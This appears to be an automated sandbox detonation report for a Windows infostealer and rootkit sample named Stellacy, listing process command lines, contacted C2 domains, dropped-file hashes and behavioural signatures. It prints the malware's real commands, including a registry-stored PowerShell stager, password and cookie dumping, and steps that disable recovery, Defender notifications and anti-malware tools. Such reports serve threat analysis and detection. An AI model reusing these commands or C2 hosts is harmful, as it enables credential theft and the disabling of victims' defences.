C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12656054402070301516-4255555401522191709-4118009271430661657693471369-971391952"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b640a9e3-a768-4522-b411-f3fd820d4a48}
C:\Windows\system32\taskeng.exe
taskeng.exe {A9057942-B5C4-4631-B462-62F08246B1CD} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f56410db-7eb5-4b3e-a77b-673cdf693e07}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1957198345-102239573611340640-1273495592588059072-68869171511852531341649145162"
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2007663707-1750485760-95921033511188272091101812646368208037425860902750494678"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagentc.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagentc.exe" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\reagent.dll"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\reagent.dll" /grant *S-1-5-32-544:F /T /C /Q
C:\Windows\system32\taskkill.exe
taskkill /im "SecurityHealthSystray.exe" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MRT" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "MRT.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "rkill.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "rkill32.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "4" /t REG_SZ /d "rkill64.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "5" /t REG_SZ /d "MBSetup.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "6" /t REG_SZ /d "mbam.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "7" /t REG_SZ /d "mbar.exe" /f
C:\Windows\system32\timeout.exe
timeout 2
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| US | 8.8.8.8:53 | itroublvehacker.gq | udp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 104.237.62.213:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | stellacy.ydns.eu | udp |
| SE | 193.138.218.173:55562 | stellacy.ydns.eu | tcp |
| US | 8.8.8.8:53 | stellacy.tk | udp |
| IE | 3.249.173.109:55562 | stellacy.tk | tcp |
| US | 8.8.8.8:53 | stellacy2.duckdns.org | udp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
| US | 8.8.8.8:53 | stellacy.duckdns.org | udp |
| US | 87.249.134.21:55562 | stellacy.duckdns.org | tcp |
| SE | 193.138.218.173:55562 | stellacy2.duckdns.org | tcp |
Files
\Users\$77main1.exe
| MD5 | 40f541872b9b1f1da056ac6d4bc90ea4 |
| SHA1 | 6e121d49311a8df04a70b6de6069460f2d55f609 |
| SHA256 | 65453a408cdcd028c8e1b091abe9397d73e2cba9708b71feac6c9ccaa497ce90 |
| SHA512 | 8456bd7ea4f898a96bd62b870f2aab466eaa4f0b0f446a108f16a9fb9ef84cd433ec9125931875138b281a9347f8ab9d99bc9d3dc54e89fb8e268f151d6dc74e |
C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat
| MD5 | ad9f604467f73ca7ddfef6f71dcf4798 |
| SHA1 | 544808b2d40f5249b65c6e1e4abcd32f3af1a896 |
| SHA256 | 7b8951b26d5ddf383a7ff37e5f2579be975d8702f7109dbc8f8393563a720ef0 |
| SHA512 | c59c1777bb07e82e35325274460adffd4b4ca216fbdc20c694ee92af772d9ce1a45ba18bd2c626083beef8e95bae82fb365414ca63100e6cc6262c2459a575f3 |
memory/2980-18-0x000000001B730000-0x000000001BA12000-memory.dmp
memory/2980-19-0x0000000002000000-0x0000000002008000-memory.dmp
C:\Users\$77Redownloader.exe
| MD5 | 067d274dc271710cb8afd7c0680958fe |
| SHA1 | 4282104ec316c3452a81afc623c61ed348331436 |
| SHA256 | c53fbf5e1b8a3c6c3930073c359a07aa6fcccfb1a0275dab49ed6584c20aa051 |
| SHA512 | 3c3a4c4678c735419d6e92570e5c9fd0cd5b34a46bb025b71c8925a27c64f9d3e5d20b16610e3085477c88b309dcbe4335aa3d6c3bac334ab461759f1320a29c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
| MD5 | b7062a62e271b7dd402b7406f8a611ad |
| SHA1 | 952cbd23fd41cbc40d17c988de946ec983d262de |
| SHA256 | d93529443f83e24a4ca90e835ab5b46fc83337862e5ab08343722945a002279c |
| SHA512 | 2f7aec552d2bcc53a218e4353c29f71e0b0af4b0c4a51c59f4ad4116e5cf46bde4584d61d3738260fb48fa03a79ec0202ba750e6e8434f4b0d3e12560fa94867 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
| MD5 | 9d972046c0e663416177f42d19f38e35 |
| SHA1 | 23aeec718eed2be8adf5380311fc787db03bfc43 |
| SHA256 | ad541a7a9372fb33689839ac297536ff01cab78c51df04c4334cf4ce2dd4e9a4 |
| SHA512 | 25e9ba52944348c5ce54df6da8efc5025aa9b8c7e4fe25f56a386f285878c3d1ef27dd5fcc22e9c51dfe25a811a0484d314b21ecfdc352d2f4bdade4e68bf808 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Backup.bat
| MD5 | 73336bee4fa2b1c3751fa012c9333a79 |
| SHA1 | 2cc55d9440ed3c17e6b05466c10334b0d3ef0408 |
| SHA256 | 435662c5b86525b076aa25aa55f06ab2f41bf34bb032544c466feac53ea378b2 |
| SHA512 | 8eefbe6eb117387ab6a88a6a7d4aa919d935df22e4d60ebb3247462f9df3ea76ec4293dd2d57445a40a9c2c23188900a297e0543cec6e9ef54555617163852b8 |
memory/948-42-0x00000000008D0000-0x00000000008D8000-memory.dmp
memory/576-43-0x0000000000810000-0x0000000000B0E000-memory.dmp
memory/948-44-0x000000001AC40000-0x000000001ACDE000-memory.dmp
\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
| MD5 | 88ab0bb59b0b20816a833ba91c1606d3 |
| SHA1 | 72c09b7789a4bac8fee41227d101daed8437edeb |
| SHA256 | f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312 |
| SHA512 | 05cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857 |
memory/1100-54-0x0000000000330000-0x000000000060A000-memory.dmp
memory/1100-55-0x000000001B560000-0x000000001B8A2000-memory.dmp
memory/1100-56-0x0000000000140000-0x0000000000146000-memory.dmp
memory/1100-57-0x0000000002420000-0x00000000024D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
| MD5 | 964c5fffcba7f353cf12d09675a46de6 |
| SHA1 | 9462c1249ef86c39da01b7480f1b2ce4a2a1a7b9 |
| SHA256 | b54e5acf0ab77f4eadf2920814d9bb3396e678fc5805fb296f9f59c41a1c52ed |
| SHA512 | ab6dd5c11abc1abf164532f50a42584189ff1a812b255221a9705dfc47f57120e7d7f241bbb802114de79d165b002283b18a6c96b2e6e3ddc4b062757f0f8565 |
memory/1608-101-0x0000000000B10000-0x0000000000B18000-memory.dmp
memory/1608-100-0x0000000019F90000-0x000000001A272000-memory.dmp
memory/1608-102-0x0000000001480000-0x00000000014BE000-memory.dmp
memory/1608-104-0x0000000077490000-0x00000000775AF000-memory.dmp
memory/1608-103-0x00000000775B0000-0x0000000077759000-memory.dmp
memory/1740-108-0x0000000077490000-0x00000000775AF000-memory.dmp
memory/1740-107-0x00000000775B0000-0x0000000077759000-memory.dmp
memory/1740-106-0x0000000140000000-0x0000000140040000-memory.dmp
memory/1740-109-0x0000000140000000-0x0000000140040000-memory.dmp
C:\Windows\Tasks\$77svc64.job
| MD5 | ebbf450c8f19360b624f7fee691f89f3 |
| SHA1 | db96ff8eb3ddc3e9ffd2688e5ab99a64322dc5d2 |
| SHA256 | 097ad0fe74c7e098469d0d659e568ae1f0d38af0314f46ae2d893168c74e3c46 |
| SHA512 | 6458685b4d9c7b8daf53d5335d571503b52ef28b491598811f9694837fbc3bb7a8f54b6fdfed8ed405777cc85ca45615a14b71d6bf04ebbe13b79a6876ae15d2 |
C:\Windows\Tasks\$77svc32.job
| MD5 | 2c4b9982208b13b81def776496577209 |
| SHA1 | 4ae896fb968ab34c339d1ceebc30609acfebe239 |
| SHA256 | 3337f7202d27823e7ba94154cc1d87e264770573a9a007931062684f9a1b5c9c |
| SHA512 | dc2d7b058c0731292e110ddcc7e4771216aef2f70175ff58515e660ee6853cfc4c8accd35beccba2b4220d45ca75c9b37dc53849edcca5da390429eb6c4be680 |
memory/432-152-0x00000000375F0000-0x0000000037600000-memory.dmp
memory/488-162-0x00000000375F0000-0x0000000037600000-memory.dmp
memory/488-160-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp
memory/488-158-0x0000000000120000-0x000000000014A000-memory.dmp
memory/432-150-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp
memory/432-148-0x0000000000DC0000-0x0000000000DEA000-memory.dmp
memory/480-127-0x00000000375F0000-0x0000000037600000-memory.dmp
memory/480-126-0x000007FEBDDA0000-0x000007FEBDDB0000-memory.dmp
memory/480-117-0x00000000000C0000-0x00000000000EA000-memory.dmp
memory/432-113-0x0000000000BB0000-0x0000000000BD3000-memory.dmp
memory/432-111-0x0000000000BB0000-0x0000000000BD3000-memory.dmp
memory/1740-105-0x0000000140000000-0x0000000140040000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\config
| MD5 | 1ba367d0f9aac0f650e65ab7401776c0 |
| SHA1 | 75cf3295125cfaa0c247ebccc57e63f915198683 |
| SHA256 | 68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03 |
| SHA512 | 45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c |
memory/1100-322-0x00000000009E0000-0x00000000009EC000-memory.dmp
memory/1100-321-0x0000000000B70000-0x0000000000BA0000-memory.dmp
memory/1100-337-0x000000001BB00000-0x000000001BBA2000-memory.dmp
memory/1100-336-0x0000000002570000-0x00000000025A2000-memory.dmp
memory/1100-335-0x0000000000BA0000-0x0000000000BBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.vbs
| MD5 | ca906422a558f4bc9e471709f62ec1a9 |
| SHA1 | e3da070007fdeae52779964df6f71fcb697ffb06 |
| SHA256 | abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee |
| SHA512 | 661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b |
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | 808099bfbd62ec04f0ed44959bbc6160 |
| SHA1 | f4b6853d958c2c4416f6e4a5be8a11d86f64c023 |
| SHA256 | f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8 |
| SHA512 | e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0 |
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
| MD5 | 053778713819beab3df309df472787cd |
| SHA1 | 99c7b5827df89b4fafc2b565abed97c58a3c65b8 |
| SHA256 | f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe |
| SHA512 | 35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb |
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | eb51755b637423154d1341c6ee505f50 |
| SHA1 | d71d27e283b26e75e58c0d02f91d91a2e914c959 |
| SHA256 | db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9 |
| SHA512 | e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5 |
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
| MD5 | a776e68f497c996788b406a3dc5089eb |
| SHA1 | 45bf5e512752389fe71f20b64aa344f6ca0cad50 |
| SHA256 | 071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1 |
| SHA512 | 02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073 |
memory/2160-485-0x0000000000400000-0x000000000045B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
| MD5 | 0d8360781e488e250587a17fbefa646c |
| SHA1 | 29bc9b438efd70defa8fc45a6f8ee524143f6d04 |
| SHA256 | ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64 |
| SHA512 | 940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e |
memory/1816-494-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\hh.exe
| MD5 | 4d4c98eca32b14aeb074db34cd0881e4 |
| SHA1 | 92f213d609bba05d41d6941652a88c44936663a4 |
| SHA256 | 4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f |
| SHA512 | 959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf |
memory/1816-515-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\compile.bat
| MD5 | 91128da441ad667b8c54ebeadeca7525 |
| SHA1 | 24b5c77fb68db64cba27c338e4373a455111a8cc |
| SHA256 | 50801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873 |
| SHA512 | bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd |
C:\Users\Admin\AppData\Local\Temp\xwizard.exe
| MD5 | df991217f1cfadd9acfa56f878da5ee7 |
| SHA1 | 0b03b34cfb2985a840db279778ca828e69813116 |
| SHA256 | deb1246347ce88e8cdd63a233a64bc2090b839f2d933a3097a2fd8fd913c4112 |
| SHA512 | 175cde9e0def550f6380b4a9feb6845dfddbb641e2455d9d25dc6bfc7ffc08e654ea731946588961a5825dcc45c8b31972454a330fd97d7170f1991a8dac0316 |
C:\Users\Admin\AppData\Local\Temp\xwizard.cfg
| MD5 | ae8eed5a6b1470aec0e7fece8b0669ef |
| SHA1 | ca0e896f90c38f3a8bc679ea14c808726d8ef730 |
| SHA256 | 3f6ca2bc068c8436044daab867f8ff8f75060048b29882cb2ac9fdef1800df9e |
| SHA512 | e79d04f4041edb867fd6bdf4485f78352292782d9405ba81888a1bc62f5039cc46c6cc786ba1fd53284baafa7128e0f875390cb573584ed2d03c3b33c7f93eb6 |
C:\Users\Admin\AppData\Local\Temp\bhv3543.tmp
| MD5 | a98ccb9cf12f4f6c47cd74863792eb49 |
| SHA1 | b74ca8f18dec991881793b6e8132224c8e17b1e3 |
| SHA256 | 43afcd74be45afd69d8c56de052e8d3364fc0ce0aec7d3acc8111b86e9744ffb |
| SHA512 | c1ea9924a90342c0b9eb3c384dfcdcefdbb1c173289a5a860f23cf86e5c25995a993914507b61e914493518ba484368dfa589d30ed69902bb69ca96718a1caba |
C:\Users\Admin\AppData\Local\Temp\whysosad
| MD5 | fc3c88c2080884d6c995d48e172fbc4f |
| SHA1 | cb1dcc479ad2533f390786b0480f66296b847ad3 |
| SHA256 | 1637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664 |
| SHA512 | 4807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x86.dll
| MD5 | ecfb232ae47a07667a5850104ebebe26 |
| SHA1 | 53db1507d46209797cad3d4029964cdfea708d8e |
| SHA256 | 6bc8e296f6935f5688234c3810f0326faebd898688688dfe3d5475e19cc5a83a |
| SHA512 | 6cd882dd1d11ee348ab4c287bc885af780e9fc79c7028d6f682c16bdda08888d67d98ab463e53e7243efe90ced9214d0aedfc460826082b09745b4a470cb0dbf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\r77-x64.dll
| MD5 | f876b8ce91d572547ea79104f3f24f48 |
| SHA1 | a154133be4547d099f4aefb9a5abbd55b02649be |
| SHA256 | c1b0a94a72e64e31c5912101b759fd72d24785fd54e5e1433ebc43697f087d2c |
| SHA512 | f3cafef52883788a12002458e382323f256b380bceacde67c919de5eb38a618db10e3cf53354787c8eddef1e1b29a1d3f97648deb1840bae5ac54af95343bcee |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-07 10:38
Reported
2024-10-07 10:41
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2728 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1252 created 612 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
